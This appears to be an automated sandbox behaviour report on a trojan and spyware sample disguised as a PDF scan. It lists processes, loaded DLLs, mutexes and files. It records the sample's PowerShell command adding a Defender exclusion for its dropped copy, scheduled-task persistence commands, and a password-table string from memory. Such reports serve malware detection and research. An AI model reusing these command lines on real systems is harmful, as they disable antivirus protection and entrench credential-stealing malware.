Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, N4HVLfQlWEtmNwYgDD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	Security API names: _0020.SetAccessControl
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	Security API names: _0020.AddAccessRule
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	Security API names: _0020.SetAccessControl
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	Security API names: _0020.AddAccessRule
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, N4HVLfQlWEtmNwYgDD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	Security API names: _0020.SetAccessControl
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/11@4/3

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

File created: C:\Users\user\AppData\Roaming\QeSBxb.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Mutant created: \Sessions\1\BaseNamedObjects\FLINeBBi

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

File created: C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp

Jump to behavior

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003444000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000003104000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

File read: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\QeSBxb.exe C:\Users\user\AppData\Roaming\QeSBxb.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process created: C:\Users\user\AppData\Roaming\QeSBxb.exe "C:\Users\user\AppData\Roaming\QeSBxb.exe"
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process created: C:\Users\user\AppData\Roaming\QeSBxb.exe "C:\Users\user\AppData\Roaming\QeSBxb.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
